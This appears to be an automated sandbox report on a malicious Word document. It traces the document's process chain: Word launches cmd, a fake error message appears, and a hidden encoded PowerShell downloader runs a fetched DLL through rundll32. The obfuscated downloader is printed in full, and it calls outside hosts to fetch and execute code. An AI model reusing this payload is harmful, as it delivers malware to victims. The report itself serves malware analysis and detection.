                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Start time:13:53:35
                                          Start date:07/01/2021
                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                          Imagebase:0x13f040000
                                          File size:1424032 bytes
                                          MD5 hash:95C38D04597050285A18F66039EDB456
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:13:53:39
                                          Start date:07/01/2021
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAcgAnACkAKQArACgAKAAnAFIAJwArACcAdwBSAHoAJwArACcAYwBKACkAKAAzAHMAMgApACgAQAAnACsAJwBoAHQAJwArACcAdAAnACkAKQArACgAKAAnAHAAOgBKACcAKwAnACkAKAAnACkAKQArACcAMwBzACcAKwAnADIAJwArACgAKAAnACkAKABKACkAJwArACcAKAAnACkAKQArACgAJwAzAHMAJwArACcAMgAnACkAKwAoACgAJwApACgAagBvACcAKwAnAHMAZQBnACcAKwAnAGUAJwArACcAbgBlAC4AYwAnACkAKQArACgAJwBvACcAKwAnAG0ASgAnACkAKwAoACgAJwApACgAMwBzACcAKwAnADIAKQAoAHQAJwArACcAaAAnACkAKQArACcAZQBtACcAKwAoACgAJwBlAEoAKQAoADMAJwArACcAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoACcAKwAnAGcAVQA4AEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAQABoAHQAdAAnACkAKQArACgAKAAnAHAAJwArACcAOgBKACkAJwApACkAKwAnACgAJwArACgAKAAnADMAcwAnACsAJwAyACkAKABKACcAKwAnACkAKAAzAHMAJwApACkAKwAoACgAJwAyACkAKABwAGEAJwArACcAdQBsACcAKwAnAHMAJwApACkAKwAoACcAYwBvACcAKwAnAG0AcAAnACkAKwAoACcAdQB0AGkAJwArACcAbgAnACkAKwAoACcAZwAuAGMAJwArACcAbwAnACkAKwAoACgAJwBtACcAKwAnAEoAKQAoADMAcwAyACkAKAAnACkAKQArACgAJwBDACcAKwAnAHIAYQBpACcAKQArACgAJwBnACcAKwAnAHMATQAnACkAKwAnAGEAZwAnACsAKAAnAGkAYwBTAHEAJwArACcAdQBhAHIAZQAnACkAKwAoACgAJwBKACkAJwArACcAKAAzAHMAMgApACgASAAnACsAJwBKACcAKwAnACkAKAAnACkAKQArACgAKAAnADMAJwArACcAcwAyACkAKAAnACkAKQArACcAQAAnACsAJwBoAHQAJwArACgAJwB0ACcAKwAnAHAAcwAnACkAKwAnADoAJwArACgAKAAnAEoAKQAnACsAJwAoACcAKQApACsAKAAnADMAJwArACcAcwAyACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAyACcAKwAnACkAKAAnACsAJwBnAG8AJwArACcAbABkAGkAbABvAGMAawAnACkAKQArACgAJwBzACcAKwAnAHQAcgAnACkAKwAoACcAYQAnACsAJwBpAG4AaQAnACkAKwAoACgAJwBuAGcAJwArACcALgAnACsAJwBjAG8AbQBKACkAKAAnACsAJwAzACcAKQApACsAKAAoACcAcwAyACkAJwArACcAKAAnACkAKQArACgAJwB3AHAAJwArACcALQAnACkAKwAoACcAaQAnACsAJwBuAGMAJwApACsAKAAnAGwAJwArACcAdQBkACcAKQArACgAJwBlAHMAJwArACcASgAnACkAKwAnACkAJwArACcAKAAnACsAKAAoACcAMwBzADIAKQAnACsAJwAoACcAKwAnAGIAZgB0AHQAJwApACkAKwAoACgAJwBKACkAKAAnACsAJwAzAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAKAAnACsAJwBAAGgAdAAnACkAKQArACgAKAAnAHQAcABzADoAJwArACcASgApACcAKQApACsAKAAoACcAKAAzAHMAJwArACcAMgApACgASgAnACsAJwApACgAMwBzACcAKQApACsAKAAoACcAMgApACgAagAnACsAJwBlAGYAZgBkACcAKwAnAGEAaABsACcAKQApACsAKAAoACcAawBlAC4AJwArACcAYwBvAG0AJwArACcASgAnACsAJwApACgAMwBzADIAKQAoACcAKQApACsAKAAoACcAYwBzAHMASgAnACsAJwApACcAKQApACsAKAAnACgAMwBzADIAJwArACcAKQAnACkAKwAoACgAJwAoAGIAZwA0AG4AMwAnACsAJwBKACkAKAAnACkAKQArACcAMwAnACsAKAAoACcAcwAyACkAJwArACcAKABAAGgAdAAnACsAJwB0AHAAJwArACcAOgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgASgApACgAJwArACcAMwBzADIAKQAoACcAKQApACsAKAAnAGEAegAnACsAJwByAGEAJwArACcAawB0AG8AJwApACsAJwB1ACcAKwAoACcAcgBzACcAKwAnAC4AYwBvACcAKwAnAG0AJwApACsAKAAoACcASgAnACsAJwApACgAJwApACkAKwAoACgAJwAzAHMAJwArACcAMgApACgAJwApACkAKwAoACcAdwAnACsAJwBwAC0AYwAnACsAJwBvAG4AdABlACcAKQArACcAbgAnACsAJwB0AEoAJwArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAKAAnACsAJwBOAFcARgAnACkAKQArACgAKAAnADkAagAnACsAJwBDAEoAKQAnACkAKQArACgAKAAnACgAJwArACcAMwBzADIAKQAoACcAKwAnAEAAJwArACcAaAB0AHQAcAAnACkAKQArACgAKAAnADoASgApACcAKwAnACgAMwAnACsAJwBzADIAJwApACkAKwAoACgAJwApACgASgAnACsAJwApACgAMwAnACkAKQArACcAcwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACcAZwBvAGwAZABjAG8AJwArACcAYQBzACcAKQArACgAJwB0AG8AZgAnACsAJwBmACcAKQArACgAJwBpAGMAJwArACcAZQAzADYANQAnACsAJwAuAGMAbwAnACkAKwAoACgAJwBtAEoAJwArACcAKQAoACcAKQApACsAJwAzAHMAJwArACgAKAAnADIAKQAoAHQAZQBtAHAAJwArACcASgApACgAMwAnACsAJwBzADIAKQAoAFgASgApACcAKwAnACgAMwBzACcAKQApACsAKAAoACcAMgAnACsAJwApACgAJwApACkAKQApAC4AIgBSAGUAYABwAGAAbABhAGMARQAiACgAKAAoACcASgAnACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKQApACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAaAB3ACcAKwAnAGUAJwApACkAWwAwAF0AKQAuACIAcwBgAHAAbABJAHQAIgAoACQAQwBkADkAcwB4ADMAYwAgACsAIAAkAEMANgA3AHkAdgBwAF8AIAArACAAJABRAGgAaABoADcAZQBpACkAOwAkAEQAYQA4AHMAaQA0ADAAPQAoACcATQAzACcAKwAoACcAeQB3AG4ANwAnACsAJwByACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABLADQAYwBlAGoAawBqACAAaQBuACAAJABDAGsAOAAxAHgAeAAyACAAfAAgAFMAbwByAFQAYAAtAG8AYgBqAGUAYABjAFQAIAB7AEcARQBUAGAALQBgAFIAYABBAE4AZABvAE0AfQApAHsAdAByAHkAewAkAE4AbQA5AGQAYwB0AG4ALgAiAEQAbwBXAGAATgBMAGAAbwBBAGQAZgBgAGkAbABlACIAKAAkAEsANABjAGUAagBrAGoALAAgACQAUABpADkAbgB5AGYAcQApADsAJABJAGYAagBpAF8AcwA1AD0AKAAnAFQAMgAnACsAJwAwACcAKwAoACcAYwAyAHoAJwArACcAZQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdAAnACsAJwBlAG0AJwApACAAJABQAGkAOQBuAHkAZgBxACkALgAiAGwARQBgAE4ARwBUAGgAIgAgAC0AZwBlACAAMwA1ADUANgA5ACkAIAB7AC4AKAAnAHIAdQAnACsAJwBuAGQAJwArACcAbABsADMAMgAnACkAIAAkAFAAaQA5AG4AeQBmAHEALAAnACMAMQAnAC4AIgBUAE8AUwBgAFQAUgBgAEkATgBnACIAKAApADsAJABKAGIAZgBhAGYAdwBsAD0AKAAnAEUAYQAnACsAJwA3AGQAJwArACgAJwByAG4AJwArACcAMwAnACkAKQA7AGIAcgBlAGEAawA7ACQASgA4ADIANwBhADYAdwA9ACgAJwBVACcAKwAoACcAMgBzADYAOABiACcAKwAnADQAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAMwBhADUAbAA1AGcAPQAoACgAJwBZACcAKwAnAGQANQBzADkAJwApACsAJwBhAGsAJwApAA==
                                          Imagebase:0x4a760000
                                          File size:345088 bytes
                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          General

                                          Start time:13:53:39
                                          Start date:07/01/2021
                                          Path:C:\Windows\System32\msg.exe
                                          Wow64 process (32bit):false
                                          Commandline:msg user /v Word experienced an error trying to open the file.
                                          Imagebase:0xff3f0000
                                          File size:26112 bytes
                                          MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          General

                                          Start time:13:53:40
                                          Start date:07/01/2021
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAcgAnACkAKQArACgAKAAnAFIAJwArACcAdwBSAHoAJwArACcAYwBKACkAKAAzAHMAMgApACgAQAAnACsAJwBoAHQAJwArACcAdAAnACkAKQArACgAKAAnAHAAOgBKACcAKwAnACkAKAAnACkAKQArACcAMwBzACcAKwAnADIAJwArACgAKAAnACkAKABKACkAJwArACcAKAAnACkAKQArACgAJwAzAHMAJwArACcAMgAnACkAKwAoACgAJwApACgAagBvACcAKwAnAHMAZQBnACcAKwAnAGUAJwArACcAbgBlAC4AYwAnACkAKQArACgAJwBvACcAKwAnAG0ASgAnACkAKwAoACgAJwApACgAMwBzACcAKwAnADIAKQAoAHQAJwArACcAaAAnACkAKQArACcAZQBtACcAKwAoACgAJwBlAEoAKQAoADMAJwArACcAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoACcAKwAnAGcAVQA4AEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAQABoAHQAdAAnACkAKQArACgAKAAnAHAAJwArACcAOgBKACkAJwApACkAKwAnACgAJwArACgAKAAnADMAcwAnACsAJwAyACkAKABKACcAKwAnACkAKAAzAHMAJwApACkAKwAoACgAJwAyACkAKABwAGEAJwArACcAdQBsACcAKwAnAHMAJwApACkAKwAoACcAYwBvACcAKwAnAG0AcAAnACkAKwAoACcAdQB0AGkAJwArACcAbgAnACkAKwAoACcAZwAuAGMAJwArACcAbwAnACkAKwAoACgAJwBtACcAKwAnAEoAKQAoADMAcwAyACkAKAAnACkAKQArACgAJwBDACcAKwAnAHIAYQBpACcAKQArACgAJwBnACcAKwAnAHMATQAnACkAKwAnAGEAZwAnACsAKAAnAGkAYwBTAHEAJwArACcAdQBhAHIAZQAnACkAKwAoACgAJwBKACkAJwArACcAKAAzAHMAMgApACgASAAnACsAJwBKACcAKwAnACkAKAAnACkAKQArACgAKAAnADMAJwArACcAcwAyACkAKAAnACkAKQArACcAQAAnACsAJwBoAHQAJwArACgAJwB0ACcAKwAnAHAAcwAnACkAKwAnADoAJwArACgAKAAnAEoAKQAnACsAJwAoACcAKQApACsAKAAnADMAJwArACcAcwAyACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAyACcAKwAnACkAKAAnACsAJwBnAG8AJwArACcAbABkAGkAbABvAGMAawAnACkAKQArACgAJwBzACcAKwAnAHQAcgAnACkAKwAoACcAYQAnACsAJwBpAG4AaQAnACkAKwAoACgAJwBuAGcAJwArACcALgAnACsAJwBjAG8AbQBKACkAKAAnACsAJwAzACcAKQApACsAKAAoACcAcwAyACkAJwArACcAKAAnACkAKQArACgAJwB3AHAAJwArACcALQAnACkAKwAoACcAaQAnACsAJwBuAGMAJwApACsAKAAnAGwAJwArACcAdQBkACcAKQArACgAJwBlAHMAJwArACcASgAnACkAKwAnACkAJwArACcAKAAnACsAKAAoACcAMwBzADIAKQAnACsAJwAoACcAKwAnAGIAZgB0AHQAJwApACkAKwAoACgAJwBKACkAKAAnACsAJwAzAHMAJwApACkAKwAnADIAJwArACgAKAAnACkAKAAnACsAJwBAAGgAdAAnACkAKQArACgAKAAnAHQAcABzADoAJwArACcASgApACcAKQApACsAKAAoACcAKAAzAHMAJwArACcAMgApACgASgAnACsAJwApACgAMwBzACcAKQApACsAKAAoACcAMgApACgAagAnACsAJwBlAGYAZgBkACcAKwAnAGEAaABsACcAKQApACsAKAAoACcAawBlAC4AJwArACcAYwBvAG0AJwArACcASgAnACsAJwApACgAMwBzADIAKQAoACcAKQApACsAKAAoACcAYwBzAHMASgAnACsAJwApACcAKQApACsAKAAnACgAMwBzADIAJwArACcAKQAnACkAKwAoACgAJwAoAGIAZwA0AG4AMwAnACsAJwBKACkAKAAnACkAKQArACcAMwAnACsAKAAoACcAcwAyACkAJwArACcAKABAAGgAdAAnACsAJwB0AHAAJwArACcAOgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgASgApACgAJwArACcAMwBzADIAKQAoACcAKQApACsAKAAnAGEAegAnACsAJwByAGEAJwArACcAawB0AG8AJwApACsAJwB1ACcAKwAoACcAcgBzACcAKwAnAC4AYwBvACcAKwAnAG0AJwApACsAKAAoACcASgAnACsAJwApACgAJwApACkAKwAoACgAJwAzAHMAJwArACcAMgApACgAJwApACkAKwAoACcAdwAnACsAJwBwAC0AYwAnACsAJwBvAG4AdABlACcAKQArACcAbgAnACsAJwB0AEoAJwArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAKAAnACsAJwBOAFcARgAnACkAKQArACgAKAAnADkAagAnACsAJwBDAEoAKQAnACkAKQArACgAKAAnACgAJwArACcAMwBzADIAKQAoACcAKwAnAEAAJwArACcAaAB0AHQAcAAnACkAKQArACgAKAAnADoASgApACcAKwAnACgAMwAnACsAJwBzADIAJwApACkAKwAoACgAJwApACgASgAnACsAJwApACgAMwAnACkAKQArACcAcwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACcAZwBvAGwAZABjAG8AJwArACcAYQBzACcAKQArACgAJwB0AG8AZgAnACsAJwBmACcAKQArACgAJwBpAGMAJwArACcAZQAzADYANQAnACsAJwAuAGMAbwAnACkAKwAoACgAJwBtAEoAJwArACcAKQAoACcAKQApACsAJwAzAHMAJwArACgAKAAnADIAKQAoAHQAZQBtAHAAJwArACcASgApACgAMwAnACsAJwBzADIAKQAoAFgASgApACcAKwAnACgAMwBzACcAKQApACsAKAAoACcAMgAnACsAJwApACgAJwApACkAKQApAC4AIgBSAGUAYABwAGAAbABhAGMARQAiACgAKAAoACcASgAnACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKQApACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAaAB3ACcAKwAnAGUAJwApACkAWwAwAF0AKQAuACIAcwBgAHAAbABJAHQAIgAoACQAQwBkADkAcwB4ADMAYwAgACsAIAAkAEMANgA3AHkAdgBwAF8AIAArACAAJABRAGgAaABoADcAZQBpACkAOwAkAEQAYQA4AHMAaQA0ADAAPQAoACcATQAzACcAKwAoACcAeQB3AG4ANwAnACsAJwByACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABLADQAYwBlAGoAawBqACAAaQBuACAAJABDAGsAOAAxAHgAeAAyACAAfAAgAFMAbwByAFQAYAAtAG8AYgBqAGUAYABjAFQAIAB7AEcARQBUAGAALQBgAFIAYABBAE4AZABvAE0AfQApAHsAdAByAHkAewAkAE4AbQA5AGQAYwB0AG4ALgAiAEQAbwBXAGAATgBMAGAAbwBBAGQAZgBgAGkAbABlACIAKAAkAEsANABjAGUAagBrAGoALAAgACQAUABpADkAbgB5AGYAcQApADsAJABJAGYAagBpAF8AcwA1AD0AKAAnAFQAMgAnACsAJwAwACcAKwAoACcAYwAyAHoAJwArACcAZQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdAAnACsAJwBlAG0AJwApACAAJABQAGkAOQBuAHkAZgBxACkALgAiAGwARQBgAE4ARwBUAGgAIgAgAC0AZwBlACAAMwA1ADUANgA5ACkAIAB7AC4AKAAnAHIAdQAnACsAJwBuAGQAJwArACcAbABsADMAMgAnACkAIAAkAFAAaQA5AG4AeQBmAHEALAAnACMAMQAnAC4AIgBUAE8AUwBgAFQAUgBgAEkATgBnACIAKAApADsAJABKAGIAZgBhAGYAdwBsAD0AKAAnAEUAYQAnACsAJwA3AGQAJwArACgAJwByAG4AJwArACcAMwAnACkAKQA7AGIAcgBlAGEAawA7ACQASgA4ADIANwBhADYAdwA9ACgAJwBVACcAKwAoACcAMgBzADYAOABiACcAKwAnADQAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAMwBhADUAbAA1AGcAPQAoACgAJwBZACcAKwAnAGQANQBzADkAJwApACsAJwBhAGsAJwApAA==
                                          Imagebase:0x13f720000
                                          File size:473600 bytes
                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2095452042.0000000001C04000.00000004.00000040.sdmp, Author: Florian Roth
                                          • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2095324924.00000000001E6000.00000004.00000001.sdmp, Author: Florian Roth
                                          Reputation:high

                                          General

                                          Start time:13:53:44
                                          Start date:07/01/2021
                                          Path:C:\Windows\System32\rundll32.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
                                          Imagebase:0xff4c0000
                                          File size:45568 bytes
                                          MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          General

                                          Start time:13:53:44
                                          Start date:07/01/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
                                          Imagebase:0x240000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
